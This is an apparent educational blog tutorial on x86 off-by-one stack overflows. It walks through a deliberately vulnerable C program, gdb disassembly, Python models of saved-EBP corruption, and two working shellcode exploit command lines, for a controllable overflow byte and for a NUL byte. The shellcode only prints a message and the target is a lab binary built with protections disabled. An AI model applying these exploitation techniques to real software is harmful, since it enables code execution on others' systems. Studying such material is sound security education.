x86 Exploitation 101: “Off-by-one” and an uninvited friend joins the party

After this deep trip into heap overflow techniques (although there’s still much to see), it’s time to go back to the stack and analyze a particular overflow scenario: the so-called “off-by-one”. What happens if the buffer we’re writing into can be overflowed by just one single byte? One of the first discussions (if not the very first one) of this kind of scenario took place on the Bugtraq mailing list: Olaf Kirch posted a message describing this vulnerability, which he called “The poisoned NUL byte”. I will quote the core of his post:

At the beginning of the function, realpath copies the argument (1024 bytes) to a local buffer (sized MAXPATHLEN, i.e. 1024 bytes). Thus, the terminating 0 byte of the string gets scribbled over the next byte, which happens to be the lowest byte of %ebp, the frame pointer of the calling function. At function entry, its value was 0xbffff3ec. After the strcpy, it becomes 0xbffff300.

During the remainder of realpath(), nothing exciting happens, but when the function returns, %ebp is restored from stack, which effectively shifts down the calling function’s stack frame by 0xec bytes.

The whole vulnerability consisted in copying a string of X bytes into a buffer of exactly X bytes (and not X + 1). Whoever wrote the code forgot that strcpy always appends an additional NUL byte to the destination buffer, marking where the string ends. If the destination buffer’s size exactly matches the length of the string, the NUL byte is written outside the buffer itself, potentially overwriting important data. In particular, if the buffer sits right below the pushed EBP value, the latter’s least significant byte (x86 is little-endian, so that byte is stored at the lowest address) is overwritten with a NUL byte.
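
To make the effect concrete, here is a minimal Python sketch that models a stack frame as a buffer immediately followed by the saved EBP and emulates an unchecked strcpy into it. The helper name strcpy_into_frame and the tiny 8-byte buffer are assumptions made for illustration; only the 0xbffff3ec value comes from Kirch's post.

```python
import struct

def strcpy_into_frame(src: bytes, saved_ebp: int, buf_size: int = 8) -> int:
    """Emulate strcpy into a frame laid out as [buffer][saved EBP].

    The frame is a hypothetical model: buf_size bytes of buffer followed by
    the saved EBP stored little-endian, as on x86. Returns the saved EBP
    value as it reads after the copy.
    """
    frame = bytearray(buf_size) + bytearray(struct.pack("<I", saved_ebp))
    data = src + b"\x00"              # strcpy always appends the terminator
    if len(data) > len(frame):
        raise ValueError("copy would run past the modelled frame")
    frame[:len(data)] = data          # no bounds check against buf_size
    return struct.unpack("<I", bytes(frame[buf_size:buf_size + 4]))[0]

if __name__ == "__main__":
    # A string of exactly buf_size bytes pushes the NUL onto EBP's low byte.
    print(hex(strcpy_into_frame(b"A" * 8, 0xBFFFF3EC)))  # 0xbffff300
    # One byte shorter and the terminator still fits inside the buffer.
    print(hex(strcpy_into_frame(b"A" * 7, 0xBFFFF3EC)))  # 0xbffff3ec
```

Only the lowest byte changes because it is the first byte of the saved EBP in memory; the upper three bytes are out of reach of a one-byte overflow.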

Slightly more than a year later, a deeper analysis of the problem appeared in Phrack #55, in the article “The Frame Pointer overwrite” by klog. The vulnerable code he proposed is the following (he ironically called it “suid”):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void func(char *sm)
{
  char buffer[256];
  memcpy(buffer, sm, 257);
}

int main(int argc, char *argv[])
{
  if (argc < 2) {
    printf("missing args\n");
    exit(-1);
  }

  func(argv[1]);

  return 0;
}

With a simple compilation

gcc -g -m32 -fno-stack-protector -z execstack -o suid suid.c

and a quick look at the disassembled executable, we can easily check out the situation:

$ gdb -q suid
Reading symbols from suid...done.
(gdb) disass func
Dump of assembler code for function func:
   0x08048525 <+0>:     push   ebp
   0x08048526 <+1>:     mov    ebp,esp
   0x08048528 <+3>:     sub    esp,0x118
   0x0804852e <+9>:     mov    DWORD PTR [esp+0x8],0x101
   0x08048536 <+17>:    mov    eax,DWORD PTR [ebp+0x8]
   0x08048539 <+20>:    mov    DWORD PTR [esp+0x4],eax
   0x0804853d <+24>:    lea    eax,[ebp-0x108]
   0x08048543 <+30>:    mov    DWORD PTR [esp],eax
   0x08048546 <+33>:    call   0x80483f0 <memcpy@plt>
   0x0804854b <+38>:    leave
   0x0804854c <+39>:    ret
End of assembler dump.
(gdb)

The LEA instruction at 0x0804853D is somewhat suspicious: why does buffer start 0x108 bytes below the pushed EBP if it is only 0x100 bytes long? Those 8 extra bytes would kill our goal, since the 257th byte would land in padding instead of on the saved EBP! Well, the answer is, again, that GCC aligns the stack to 16 bytes by default; this is fixable by adding the -mpreferred-stack-boundary=2 parameter to GCC’s command line:

gcc -g -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -o suid suid.c

$ gdb -q suid
Reading symbols from suid...done.
(gdb) disass main
Dump of assembler code for function main:
   0x0804854d <+0>:     push   ebp
   0x0804854e <+1>:     mov    ebp,esp
   0x08048550 <+3>:     sub    esp,0x4
   0x08048553 <+6>:     cmp    DWORD PTR [ebp+0x8],0x1
   0x08048557 <+10>:    jg     0x8048571 <main+36>
   0x08048559 <+12>:    mov    DWORD PTR [esp],0x8048620
   0x08048560 <+19>:    call   0x8048400 <puts@plt>
   0x08048565 <+24>:    mov    DWORD PTR [esp],0xffffffff
   0x0804856c <+31>:    call   0x8048410 <exit@plt>
   0x08048571 <+36>:    mov    eax,DWORD PTR [ebp+0xc]
   0x08048574 <+39>:    add    eax,0x4
   0x08048577 <+42>:    mov    eax,DWORD PTR [eax]
   0x08048579 <+44>:    mov    DWORD PTR [esp],eax
   0x0804857c <+47>:    call   0x8048525 <func>
   0x08048581 <+52>:    mov    eax,0x0
   0x08048586 <+57>:    leave
   0x08048587 <+58>:    ret
End of assembler dump.
(gdb) disass func
Dump of assembler code for function func:
   0x08048525 <+0>:     push   ebp
   0x08048526 <+1>:     mov    ebp,esp
   0x08048528 <+3>:     sub    esp,0x118
   0x0804852e <+9>:     mov    DWORD PTR [esp+0x8],0x101
   0x08048536 <+17>:    mov    eax,DWORD PTR [ebp+0x8]
   0x08048539 <+20>:    mov    DWORD PTR [esp+0x4],eax
   0x0804853d <+24>:    lea    eax,[ebp-0x100]
   0x08048543 <+30>:    mov    DWORD PTR [esp],eax
   0x08048546 <+33>:    call   0x80483f0 <memcpy@plt>
   0x0804854b <+38>:    leave
   0x0804854c <+39>:    ret
End of assembler dump.
(gdb)

Definitely better. So, the first instructions of func describe the layout that the stack is going to adopt:

STACK:   ^
         |
         |      pushed EIP
         |      pushed EBP
         |      buffer[255]
         |      buffer[254]
         |      ...
         |      buffer[0]
         |

So, as expected, the extra byte will overwrite the least significant byte of the pushed EBP value. What are the consequences of this? How can an EBP changed from 0x11223344 to 0x112233XX be exploited? In order to understand this, a little bit of study is required. Right before func returns, the LEAVE at 0x0804854B restores the pushed (and changed) value of EBP into the register, and then the function returns; the real deal comes when main returns as well, as the LEAVE instruction at 0x08048586 will copy EBP to ESP and pop EBP from the stack. At the end of the execution of this instruction, ESP will be set to 0x112233XX + 4 (because of the popping), and the RET that follows will fetch the return address from that location.

This whole thing is easily verifiable:

$ gdb -q suid
Reading symbols from suid...done.
(gdb) b *0x08048587
Breakpoint 1 at 0x8048587
(gdb) b *0x0804854C
Breakpoint 2 at 0x804854c
(gdb) r `python -c 'import sys; sys.stdout.write("A" * 257)'`

Breakpoint 2, 0x0804854c in func ()
(gdb) i r ebp
ebp            0xffffcd41       0xffffcd41
(gdb) c
Continuing.

Breakpoint 1, 0x08048587 in main ()
(gdb) i r esp
esp            0xffffcd45       0xffffcd45

ESP got “damaged” and, right before returning from main, is set to 0xFFFFCD45: the saved EBP with its low byte replaced by 0x41 (our last “A”), plus 4. Even if we’re not able to overwrite the return address directly, being able to set ESP to a partially arbitrary value lets us fool the CPU into believing that the return address is somewhere else: inside our buffer variable.
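
The two epilogues can be replayed with a tiny Python model of LEAVE and RET. This is only a sketch: memory is a dictionary of 32-bit words, FUNC_EBP is a made-up address for func's frame pointer (the session above does not show it), and the word at 0xFFFFCD45 is assumed to contain part of the run of “A”s.

```python
def leave(mem, ebp):
    """LEAVE = mov esp, ebp ; pop ebp. Returns (esp, ebp) afterwards."""
    esp = ebp
    new_ebp = mem.get(esp, 0)   # pop ebp
    return esp + 4, new_ebp

def ret(mem, esp):
    """RET = pop eip. Returns (eip, esp) afterwards."""
    return mem.get(esp, 0), esp + 4

def run_epilogues(mem, func_ebp):
    """Replay func's LEAVE/RET, then main's LEAVE/RET.

    Returns (ESP right before main's RET, EIP loaded by main's RET).
    """
    esp, ebp = leave(mem, func_ebp)  # EBP now holds the corrupted saved value
    _, esp = ret(mem, esp)           # back in main, EBP is still corrupted
    esp, ebp = leave(mem, ebp)       # main: ESP = corrupted EBP + 4
    eip, _ = ret(mem, esp)           # return address read from the new ESP
    return esp, eip

# Hypothetical address of func's frame pointer, chosen only for the model.
FUNC_EBP = 0xFFFFCD5C

memory = {
    FUNC_EBP: 0xFFFFCD41,      # saved EBP after the 257th "A" hit its low byte
    0xFFFFCD45: 0x41414141,    # assumed: this word lies inside the run of "A"s
}

if __name__ == "__main__":
    esp, eip = run_epilogues(memory, FUNC_EBP)
    print(hex(esp), hex(eip))  # 0xffffcd45 0x41414141
```

The model shows why controlling one byte of the saved EBP is enough: main's RET reads its return address from wherever the corrupted EBP points, plus 4.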

The next step is to make it point to the right position in buffer and to fill the latter with a valid shellcode. This is what buffer’s layout will look like:

NOPs
Shellcode
New return address
Overflowing byte

For the first two elements there’s not much to say… Just a bunch of NOP instructions and the usual shellcode will do. The new return address will match, of course, buffer’s address (in my case 0xFFFFCD1C); as for the overflowing byte, it must be computed so that the CPU thinks the return address is the one we stored in buffer. On my computer, right after the memcpy, buffer looks like this:

(gdb) x/65x 0xFFFFCD1C
0xffffcd1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdac:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcddc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdec:     0x90909090      0x90909090      0xc03117eb      0xc931db31
0xffffcdfc:     0x04b0d231      0xb25901b3      0xb080cd06      0xcddb3101
0xffffce0c:     0xffe4e880      0x7750ffff      0x2164656e      0xffffcd1c
0xffffce1c:     0xffffceXX

EBP       -> 0xFFFFCE1C

In order to trick the CPU properly, the saved EBP stored at 0xFFFFCE1C must be set to 0xFFFFCE14, so that main’s LEAVE leaves ESP at 0xFFFFCE18, exactly where our new return address sits: this means that 0x14 is the overflowing byte.
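
The same arithmetic can be written down as a small Python helper. It is a sketch under stated assumptions: overflow_byte is a name invented here, and the original saved EBP is taken to be 0xFFFFCE28, a value inferred from main's prologue (the dump only shows it as 0xffffceXX); only its upper three bytes matter.

```python
def overflow_byte(buffer_addr, buffer_size, ret_offset, saved_ebp):
    """Return the byte to write over the low byte of the saved EBP.

    ret_offset is where, inside the buffer, the new return address is stored.
    main's LEAVE sets ESP to (corrupted EBP + 4), so the corrupted EBP must
    point 4 bytes below that slot.
    """
    if ret_offset + 4 > buffer_size:
        raise ValueError("return address slot does not fit in the buffer")
    ret_slot = buffer_addr + ret_offset
    wanted_ebp = ret_slot - 4
    # Only the low byte is under our control: the rest must already match.
    if (wanted_ebp & 0xFFFFFF00) != (saved_ebp & 0xFFFFFF00):
        raise ValueError("target is not reachable by changing one byte")
    return wanted_ebp & 0xFF

if __name__ == "__main__":
    # 216 NOPs + 36 bytes of shellcode put the return address at offset 252.
    byte = overflow_byte(0xFFFFCD1C, 256, 252, 0xFFFFCE28)
    print(hex(byte))  # 0x14
```

The reachability check matters in practice: if the buffer and the saved EBP value do not share their upper three bytes, no choice of overflowing byte can point ESP back into the buffer.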
Well, everything’s ready. Let’s try this one out:

$ ./suid `python -c 'import sys; sys.stdout.write("\x90" * (252-36) + "\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21" + "\x1c\xcd\xff\xff" + "\x14")'`
Pwned!$

Yah-wee!!!! It works!

But it’s not over yet. What if we’re not able to control the overflowing byte? What if, instead of memcpy, we had a wrongly-used strcpy (which is more similar to Kirch’s scenario)?
So, the code changes in the following way:

void func(char *sm)
{
  char buffer[256];
  if(strlen(sm) <= 256)
    strcpy(buffer, sm);
}

When sm is exactly 256 bytes long, strcpy will copy it into buffer and then add the NUL character just outside the boundaries. So, our overflowing byte will be 0x00, without any chance of modifying it. Not a big deal: we just need to rearrange the content of buffer.
We know that the stored EBP value will be corrupted to 0xFFFFCE00 (because of the NUL character): this means that the return address must be stored 4 bytes after that, at 0xFFFFCE04. buffer will look like this:

NOPs
Shellcode
NOPs
New return address
NOPs

(gdb) x/65x 0xFFFFCD1C
0xffffcd1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdac:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcddc:     0x90909090      0xc03117eb      0xc931db31      0x04b0d231
0xffffcdec:     0xb25901b3      0xb080cd06      0xcddb3101      0xffe4e880
0xffffcdfc:     0x7750ffff      0x2164656e      0xffffcd1c      0x90909090
0xffffce0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffce1c:     0xffffce00

(NOPs… NOPs everywhere)
Running this one will work:

$ ./suid `python -c 'import sys; sys.stdout.write("\x90" * (232-36) + "\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21" + "\x1c\xcd\xff\xff" + "\x90" * 20)'`
Pwned!$
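
The numbers in that command line (232-36 leading NOPs, 20 trailing ones) follow directly from the addresses involved, as this Python sketch shows. The function name build_nul_payload is hypothetical, and the original saved EBP is assumed to be 0xFFFFCE28 (inferred from main's prologue; only its upper three bytes are used). The shellcode bytes are the ones used throughout this post.

```python
import struct

# The 36-byte shellcode from this post (it prints "Pwned!" and exits).
SHELLCODE = (
    b"\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2"
    b"\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77"
    b"\x6e\x65\x64\x21"
)

def build_nul_payload(buffer_addr, buffer_size, saved_ebp, shellcode):
    """Lay out NOPs + shellcode + return address + NOPs for the strcpy case."""
    corrupted_ebp = saved_ebp & 0xFFFFFF00   # low byte forced to NUL
    ret_slot = corrupted_ebp + 4             # where main's RET will read
    offset = ret_slot - buffer_addr          # position inside the buffer
    if not len(shellcode) <= offset <= buffer_size - 4:
        raise ValueError("return address slot falls outside the usable area")
    payload = b"\x90" * (offset - len(shellcode)) + shellcode
    payload += struct.pack("<I", buffer_addr)        # jump to the NOP sled
    payload += b"\x90" * (buffer_size - len(payload))
    if b"\x00" in payload:
        raise ValueError("a NUL byte would stop strcpy early")
    return payload

if __name__ == "__main__":
    p = build_nul_payload(0xFFFFCD1C, 256, 0xFFFFCE28, SHELLCODE)
    print(len(p), p.index(SHELLCODE))  # 256 196
```

The payload is exactly 256 bytes so that it passes the strlen check and strcpy's terminator is the 257th byte; the NUL check is there because any zero byte inside the payload would end the copy too early.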

Throughout the testing I had, once again, to disable ASLR. In conclusion, even a one-byte overflow is enough to change the original behaviour of an application and to subvert it to our will. There’s never peace for these guys…
